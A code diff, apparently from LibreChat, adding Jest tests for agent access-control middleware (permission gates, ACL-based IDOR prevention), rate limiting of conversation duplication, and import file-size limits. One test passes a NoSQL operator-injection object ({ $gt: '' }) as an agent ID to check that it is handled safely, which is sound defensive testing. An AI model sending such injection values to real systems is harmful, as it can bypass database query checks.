|
describe('addedConvo — MULTI_CONVO permission gate', () => {
|
||||||
|
test('returns 403 when user lacks MULTI_CONVO:USE', async () => {
|
||||||
|
req.user.role = 'no-multi-convo';
|
||||||
|
req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
expect(res.json).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({ message: 'Multi-conversation feature is not enabled' }),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('returns 403 when user.role is missing', async () => {
|
||||||
|
req.user = { id: testUser._id };
|
||||||
|
req.body.addedConvo = { agent_id: 'agent_x', endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('ADMIN bypasses MULTI_CONVO check', async () => {
|
||||||
|
req.user.role = SystemRoles.ADMIN;
|
||||||
|
req.body.addedConvo = { agent_id: 'ephemeral_x', endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
expect(res.status).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('addedConvo — agent_id shape validation', () => {
|
||||||
|
test('calls next when agent_id is ephemeral', async () => {
|
||||||
|
req.body.addedConvo = { agent_id: 'ephemeral_xyz', endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('calls next when agent_id is absent', async () => {
|
||||||
|
req.body.addedConvo = { endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('calls next when agent_id is not a string (object injection)', async () => {
|
||||||
|
req.body.addedConvo = { agent_id: { $gt: '' }, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('addedConvo — agent resource ACL (IDOR prevention)', () => {
|
||||||
|
let addedAgent;
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
addedAgent = await createAgent({
|
||||||
|
id: `agent_added_${Date.now()}`,
|
||||||
|
name: 'Private Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 15,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
test('returns 403 when requester has no ACL for the added agent', async () => {
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
expect(res.json).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({
|
||||||
|
message: 'Insufficient permissions to access this agent',
|
||||||
|
}),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('returns 404 when added agent does not exist', async () => {
|
||||||
|
req.body.addedConvo = {
|
||||||
|
agent_id: 'agent_nonexistent_999',
|
||||||
|
endpoint: 'agents',
|
||||||
|
model: 'gpt-4',
|
||||||
|
};
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(404);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('proceeds when requester has ACL for the added agent', async () => {
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: testUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 1,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
expect(res.status).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('denies when ACL permission bits are insufficient', async () => {
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: testUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 1,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 2 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('caches resolved agent on req.resolvedAddedAgent', async () => {
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: testUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 1,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
expect(req.resolvedAddedAgent).toBeDefined();
|
||||||
|
expect(req.resolvedAddedAgent._id.toString()).toBe(addedAgent._id.toString());
|
||||||
|
});
|
||||||
|
|
||||||
|
test('ADMIN bypasses agent resource ACL for addedConvo', async () => {
|
||||||
|
req.user.role = SystemRoles.ADMIN;
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
expect(res.status).not.toHaveBeenCalled();
|
||||||
|
expect(req.resolvedAddedAgent).toBeUndefined();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('end-to-end: primary real agent + addedConvo real agent', () => {
|
||||||
|
let primaryAgent, addedAgent;
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
primaryAgent = await createAgent({
|
||||||
|
id: `agent_primary_${Date.now()}`,
|
||||||
|
name: 'Primary Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: testUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: testUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: primaryAgent._id,
|
||||||
|
permBits: 15,
|
||||||
|
grantedBy: testUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
addedAgent = await createAgent({
|
||||||
|
id: `agent_added_${Date.now()}`,
|
||||||
|
name: 'Added Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 15,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
req.body.agent_id = primaryAgent.id;
|
||||||
|
});
|
||||||
|
|
||||||
|
test('both checks pass when user has ACL for both agents', async () => {
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: testUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 1,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
expect(res.status).not.toHaveBeenCalled();
|
||||||
|
expect(req.resolvedAddedAgent).toBeDefined();
|
||||||
|
});
|
||||||
|
|
||||||
|
test('primary passes but addedConvo denied → 403', async () => {
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('primary denied → 403 without reaching addedConvo check', async () => {
|
||||||
|
const foreignAgent = await createAgent({
|
||||||
|
id: `agent_foreign_${Date.now()}`,
|
||||||
|
name: 'Foreign Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: foreignAgent._id,
|
||||||
|
permBits: 15,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
req.body.agent_id = foreignAgent.id;
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('ephemeral primary + real addedConvo agent', () => {
|
||||||
|
let addedAgent;
|
||||||
|
|
||||||
|
beforeEach(async () => {
|
||||||
|
addedAgent = await createAgent({
|
||||||
|
id: `agent_added_${Date.now()}`,
|
||||||
|
name: 'Added Agent',
|
||||||
|
provider: 'openai',
|
||||||
|
model: 'gpt-4',
|
||||||
|
author: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: otherUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 15,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
test('runs full addedConvo ACL check even when primary is ephemeral', async () => {
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).not.toHaveBeenCalled();
|
||||||
|
expect(res.status).toHaveBeenCalledWith(403);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('proceeds when user has ACL for added agent (ephemeral primary)', async () => {
|
||||||
|
await AclEntry.create({
|
||||||
|
principalType: PrincipalType.USER,
|
||||||
|
principalId: testUser._id,
|
||||||
|
principalModel: PrincipalModel.USER,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceId: addedAgent._id,
|
||||||
|
permBits: 1,
|
||||||
|
grantedBy: otherUser._id,
|
||||||
|
});
|
||||||
|
|
||||||
|
req.body.addedConvo = { agent_id: addedAgent.id, endpoint: 'agents', model: 'gpt-4' };
|
||||||
|
|
||||||
|
const middleware = canAccessAgentFromBody({ requiredPermission: 1 });
|
||||||
|
await middleware(req, res, next);
|
||||||
|
|
||||||
|
expect(next).toHaveBeenCalled();
|
||||||
|
expect(res.status).not.toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -48,7 +48,7 @@ const createForkHandler = (ip = true) => {
|
||||||
};
|
};
|
||||||
|
|
||||||
await logViolation(req, res, type, errorMessage, forkViolationScore);
|
await logViolation(req, res, type, errorMessage, forkViolationScore);
|
||||||
res.status(429).json({ message: 'Too many conversation fork requests. Try again later' });
|
res.status(429).json({ message: 'Too many requests. Try again later' });
|
||||||
};
|
};
|
||||||
};
|
};
|
||||||
|
|
||||||
|
|
|
||||||
93
api/server/routes/__test-utils__/convos-route-mocks.js
Normal file
93
api/server/routes/__test-utils__/convos-route-mocks.js
Normal file
|
|
@ -0,0 +1,93 @@
|
||||||
|
module.exports = {
|
||||||
|
agents: () => ({ sleep: jest.fn() }),
|
||||||
|
|
||||||
|
api: (overrides = {}) => ({
|
||||||
|
isEnabled: jest.fn(),
|
||||||
|
resolveImportMaxFileSize: jest.fn(() => 262144000),
|
||||||
|
createAxiosInstance: jest.fn(() => ({
|
||||||
|
get: jest.fn(),
|
||||||
|
post: jest.fn(),
|
||||||
|
put: jest.fn(),
|
||||||
|
delete: jest.fn(),
|
||||||
|
})),
|
||||||
|
logAxiosError: jest.fn(),
|
||||||
|
...overrides,
|
||||||
|
}),
|
||||||
|
|
||||||
|
dataSchemas: () => ({
|
||||||
|
logger: {
|
||||||
|
debug: jest.fn(),
|
||||||
|
info: jest.fn(),
|
||||||
|
warn: jest.fn(),
|
||||||
|
error: jest.fn(),
|
||||||
|
},
|
||||||
|
createModels: jest.fn(() => ({
|
||||||
|
User: {},
|
||||||
|
Conversation: {},
|
||||||
|
Message: {},
|
||||||
|
SharedLink: {},
|
||||||
|
})),
|
||||||
|
}),
|
||||||
|
|
||||||
|
dataProvider: (overrides = {}) => ({
|
||||||
|
CacheKeys: { GEN_TITLE: 'GEN_TITLE' },
|
||||||
|
EModelEndpoint: {
|
||||||
|
azureAssistants: 'azureAssistants',
|
||||||
|
assistants: 'assistants',
|
||||||
|
},
|
||||||
|
...overrides,
|
||||||
|
}),
|
||||||
|
|
||||||
|
conversationModel: () => ({
|
||||||
|
getConvosByCursor: jest.fn(),
|
||||||
|
getConvo: jest.fn(),
|
||||||
|
deleteConvos: jest.fn(),
|
||||||
|
saveConvo: jest.fn(),
|
||||||
|
}),
|
||||||
|
|
||||||
|
toolCallModel: () => ({ deleteToolCalls: jest.fn() }),
|
||||||
|
|
||||||
|
sharedModels: () => ({
|
||||||
|
deleteAllSharedLinks: jest.fn(),
|
||||||
|
deleteConvoSharedLink: jest.fn(),
|
||||||
|
}),
|
||||||
|
|
||||||
|
requireJwtAuth: () => (req, res, next) => next(),
|
||||||
|
|
||||||
|
middlewarePassthrough: () => ({
|
||||||
|
createImportLimiters: jest.fn(() => ({
|
||||||
|
importIpLimiter: (req, res, next) => next(),
|
||||||
|
importUserLimiter: (req, res, next) => next(),
|
||||||
|
})),
|
||||||
|
createForkLimiters: jest.fn(() => ({
|
||||||
|
forkIpLimiter: (req, res, next) => next(),
|
||||||
|
forkUserLimiter: (req, res, next) => next(),
|
||||||
|
})),
|
||||||
|
configMiddleware: (req, res, next) => next(),
|
||||||
|
validateConvoAccess: (req, res, next) => next(),
|
||||||
|
}),
|
||||||
|
|
||||||
|
forkUtils: () => ({
|
||||||
|
forkConversation: jest.fn(),
|
||||||
|
duplicateConversation: jest.fn(),
|
||||||
|
}),
|
||||||
|
|
||||||
|
importUtils: () => ({ importConversations: jest.fn() }),
|
||||||
|
|
||||||
|
logStores: () => jest.fn(),
|
||||||
|
|
||||||
|
multerSetup: () => ({
|
||||||
|
storage: {},
|
||||||
|
importFileFilter: jest.fn(),
|
||||||
|
}),
|
||||||
|
|
||||||
|
multerLib: () =>
|
||||||
|
jest.fn(() => ({
|
||||||
|
single: jest.fn(() => (req, res, next) => {
|
||||||
|
req.file = { path: '/tmp/test-file.json' };
|
||||||
|
next();
|
||||||
|
}),
|
||||||
|
})),
|
||||||
|
|
||||||
|
assistantEndpoint: () => ({ initializeClient: jest.fn() }),
|
||||||
|
};
|
||||||
135
api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js
Normal file
135
api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js
Normal file
|
|
@ -0,0 +1,135 @@
|
||||||
|
const express = require('express');
|
||||||
|
const request = require('supertest');
|
||||||
|
|
||||||
|
const MOCKS = '../__test-utils__/convos-route-mocks';
|
||||||
|
|
||||||
|
jest.mock('@librechat/agents', () => require(MOCKS).agents());
|
||||||
|
jest.mock('@librechat/api', () => require(MOCKS).api({ limiterCache: jest.fn(() => undefined) }));
|
||||||
|
jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
|
||||||
|
jest.mock('librechat-data-provider', () =>
|
||||||
|
require(MOCKS).dataProvider({ ViolationTypes: { FILE_UPLOAD_LIMIT: 'file_upload_limit' } }),
|
||||||
|
);
|
||||||
|
|
||||||
|
jest.mock('~/cache/logViolation', () => jest.fn().mockResolvedValue(undefined));
|
||||||
|
jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores());
|
||||||
|
jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
|
||||||
|
jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
|
||||||
|
jest.mock('~/models', () => require(MOCKS).sharedModels());
|
||||||
|
jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth());
|
||||||
|
|
||||||
|
jest.mock('~/server/middleware', () => {
|
||||||
|
const { createForkLimiters } = jest.requireActual('~/server/middleware/limiters/forkLimiters');
|
||||||
|
return {
|
||||||
|
createImportLimiters: jest.fn(() => ({
|
||||||
|
importIpLimiter: (req, res, next) => next(),
|
||||||
|
importUserLimiter: (req, res, next) => next(),
|
||||||
|
})),
|
||||||
|
createForkLimiters,
|
||||||
|
configMiddleware: (req, res, next) => next(),
|
||||||
|
validateConvoAccess: (req, res, next) => next(),
|
||||||
|
};
|
||||||
|
});
|
||||||
|
|
||||||
|
jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils());
|
||||||
|
jest.mock('~/server/utils/import', () => require(MOCKS).importUtils());
|
||||||
|
jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup());
|
||||||
|
jest.mock('multer', () => require(MOCKS).multerLib());
|
||||||
|
jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint());
|
||||||
|
jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint());
|
||||||
|
|
||||||
|
describe('POST /api/convos/duplicate - Rate Limiting', () => {
|
||||||
|
let app;
|
||||||
|
let duplicateConversation;
|
||||||
|
const savedEnv = {};
|
||||||
|
|
||||||
|
beforeAll(() => {
|
||||||
|
savedEnv.FORK_USER_MAX = process.env.FORK_USER_MAX;
|
||||||
|
savedEnv.FORK_USER_WINDOW = process.env.FORK_USER_WINDOW;
|
||||||
|
savedEnv.FORK_IP_MAX = process.env.FORK_IP_MAX;
|
||||||
|
savedEnv.FORK_IP_WINDOW = process.env.FORK_IP_WINDOW;
|
||||||
|
});
|
||||||
|
|
||||||
|
afterAll(() => {
|
||||||
|
for (const key of Object.keys(savedEnv)) {
|
||||||
|
if (savedEnv[key] === undefined) {
|
||||||
|
delete process.env[key];
|
||||||
|
} else {
|
||||||
|
process.env[key] = savedEnv[key];
|
||||||
|
}
|
||||||
|
}
|
||||||
|
});
|
||||||
|
|
||||||
|
const setupApp = () => {
|
||||||
|
jest.clearAllMocks();
|
||||||
|
jest.isolateModules(() => {
|
||||||
|
const convosRouter = require('../convos');
|
||||||
|
({ duplicateConversation } = require('~/server/utils/import/fork'));
|
||||||
|
|
||||||
|
app = express();
|
||||||
|
app.use(express.json());
|
||||||
|
app.use((req, res, next) => {
|
||||||
|
req.user = { id: 'rate-limit-test-user' };
|
||||||
|
next();
|
||||||
|
});
|
||||||
|
app.use('/api/convos', convosRouter);
|
||||||
|
});
|
||||||
|
|
||||||
|
duplicateConversation.mockResolvedValue({
|
||||||
|
conversation: { conversationId: 'duplicated-conv' },
|
||||||
|
});
|
||||||
|
};
|
||||||
|
|
||||||
|
describe('user limit', () => {
|
||||||
|
beforeEach(() => {
|
||||||
|
process.env.FORK_USER_MAX = '2';
|
||||||
|
process.env.FORK_USER_WINDOW = '1';
|
||||||
|
process.env.FORK_IP_MAX = '100';
|
||||||
|
process.env.FORK_IP_WINDOW = '1';
|
||||||
|
setupApp();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 429 after exceeding the user rate limit', async () => {
|
||||||
|
const userMax = parseInt(process.env.FORK_USER_MAX, 10);
|
||||||
|
|
||||||
|
for (let i = 0; i < userMax; i++) {
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/api/convos/duplicate')
|
||||||
|
.send({ conversationId: 'conv-123' });
|
||||||
|
expect(res.status).toBe(201);
|
||||||
|
}
|
||||||
|
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/api/convos/duplicate')
|
||||||
|
.send({ conversationId: 'conv-123' });
|
||||||
|
expect(res.status).toBe(429);
|
||||||
|
expect(res.body.message).toMatch(/too many/i);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
|
describe('IP limit', () => {
|
||||||
|
beforeEach(() => {
|
||||||
|
process.env.FORK_USER_MAX = '100';
|
||||||
|
process.env.FORK_USER_WINDOW = '1';
|
||||||
|
process.env.FORK_IP_MAX = '2';
|
||||||
|
process.env.FORK_IP_WINDOW = '1';
|
||||||
|
setupApp();
|
||||||
|
});
|
||||||
|
|
||||||
|
it('should return 429 after exceeding the IP rate limit', async () => {
|
||||||
|
const ipMax = parseInt(process.env.FORK_IP_MAX, 10);
|
||||||
|
|
||||||
|
for (let i = 0; i < ipMax; i++) {
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/api/convos/duplicate')
|
||||||
|
.send({ conversationId: 'conv-123' });
|
||||||
|
expect(res.status).toBe(201);
|
||||||
|
}
|
||||||
|
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/api/convos/duplicate')
|
||||||
|
.send({ conversationId: 'conv-123' });
|
||||||
|
expect(res.status).toBe(429);
|
||||||
|
expect(res.body.message).toMatch(/too many/i);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
98
api/server/routes/__tests__/convos-import.spec.js
Normal file
98
api/server/routes/__tests__/convos-import.spec.js
Normal file
|
|
@ -0,0 +1,98 @@
|
||||||
|
const express = require('express');
|
||||||
|
const request = require('supertest');
|
||||||
|
const multer = require('multer');
|
||||||
|
|
||||||
|
const importFileFilter = (req, file, cb) => {
|
||||||
|
if (file.mimetype === 'application/json') {
|
||||||
|
cb(null, true);
|
||||||
|
} else {
|
||||||
|
cb(new Error('Only JSON files are allowed'), false);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
/** Proxy app that mirrors the production multer + error-handling pattern */
|
||||||
|
function createImportApp(fileSize) {
|
||||||
|
const app = express();
|
||||||
|
const upload = multer({
|
||||||
|
storage: multer.memoryStorage(),
|
||||||
|
fileFilter: importFileFilter,
|
||||||
|
limits: { fileSize },
|
||||||
|
});
|
||||||
|
const uploadSingle = upload.single('file');
|
||||||
|
|
||||||
|
function handleUpload(req, res, next) {
|
||||||
|
uploadSingle(req, res, (err) => {
|
||||||
|
if (err && err.code === 'LIMIT_FILE_SIZE') {
|
||||||
|
return res.status(413).json({ message: 'File exceeds the maximum allowed size' });
|
||||||
|
}
|
||||||
|
if (err) {
|
||||||
|
return next(err);
|
||||||
|
}
|
||||||
|
next();
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
app.post('/import', handleUpload, (req, res) => {
|
||||||
|
res.status(201).json({ message: 'success', size: req.file.size });
|
||||||
|
});
|
||||||
|
|
||||||
|
app.use((err, _req, res, _next) => {
|
||||||
|
res.status(400).json({ error: err.message });
|
||||||
|
});
|
||||||
|
|
||||||
|
return app;
|
||||||
|
}
|
||||||
|
|
||||||
|
describe('Conversation Import - Multer File Size Limits', () => {
|
||||||
|
describe('multer rejects files exceeding the configured limit', () => {
|
||||||
|
it('returns 413 for files larger than the limit', async () => {
|
||||||
|
const limit = 1024;
|
||||||
|
const app = createImportApp(limit);
|
||||||
|
const oversized = Buffer.alloc(limit + 512, 'x');
|
||||||
|
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/import')
|
||||||
|
.attach('file', oversized, { filename: 'import.json', contentType: 'application/json' });
|
||||||
|
|
||||||
|
expect(res.status).toBe(413);
|
||||||
|
expect(res.body.message).toBe('File exceeds the maximum allowed size');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('accepts files within the limit', async () => {
|
||||||
|
const limit = 4096;
|
||||||
|
const app = createImportApp(limit);
|
||||||
|
const valid = Buffer.from(JSON.stringify({ title: 'test' }));
|
||||||
|
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/import')
|
||||||
|
.attach('file', valid, { filename: 'import.json', contentType: 'application/json' });
|
||||||
|
|
||||||
|
expect(res.status).toBe(201);
|
||||||
|
expect(res.body.message).toBe('success');
|
||||||
|
});
|
||||||
|
|
||||||
|
it('rejects at the exact boundary (limit + 1 byte)', async () => {
|
||||||
|
const limit = 512;
|
||||||
|
const app = createImportApp(limit);
|
||||||
|
const boundary = Buffer.alloc(limit + 1, 'a');
|
||||||
|
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/import')
|
||||||
|
.attach('file', boundary, { filename: 'import.json', contentType: 'application/json' });
|
||||||
|
|
||||||
|
expect(res.status).toBe(413);
|
||||||
|
});
|
||||||
|
|
||||||
|
it('accepts a file just under the limit', async () => {
|
||||||
|
const limit = 512;
|
||||||
|
const app = createImportApp(limit);
|
||||||
|
const underLimit = Buffer.alloc(limit - 1, 'b');
|
||||||
|
|
||||||
|
const res = await request(app)
|
||||||
|
.post('/import')
|
||||||
|
.attach('file', underLimit, { filename: 'import.json', contentType: 'application/json' });
|
||||||
|
|
||||||
|
expect(res.status).toBe(201);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
@ -1,109 +1,24 @@
|
||||||
const express = require('express');
|
const express = require('express');
|
||||||
const request = require('supertest');
|
const request = require('supertest');
|
||||||
|
|
||||||
jest.mock('@librechat/agents', () => ({
|
const MOCKS = '../__test-utils__/convos-route-mocks';
|
||||||
sleep: jest.fn(),
|
|
||||||
}));
|
|
||||||
|
|
||||||
jest.mock('@librechat/api', () => ({
|
jest.mock('@librechat/agents', () => require(MOCKS).agents());
|
||||||
isEnabled: jest.fn(),
|
jest.mock('@librechat/api', () => require(MOCKS).api());
|
||||||
createAxiosInstance: jest.fn(() => ({
|
jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas());
|
||||||
get: jest.fn(),
|
jest.mock('librechat-data-provider', () => require(MOCKS).dataProvider());
|
||||||
post: jest.fn(),
|
jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel());
|
||||||
put: jest.fn(),
|
jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel());
|
||||||
delete: jest.fn(),
|
jest.mock('~/models', () => require(MOCKS).sharedModels());
|
||||||
})),
|
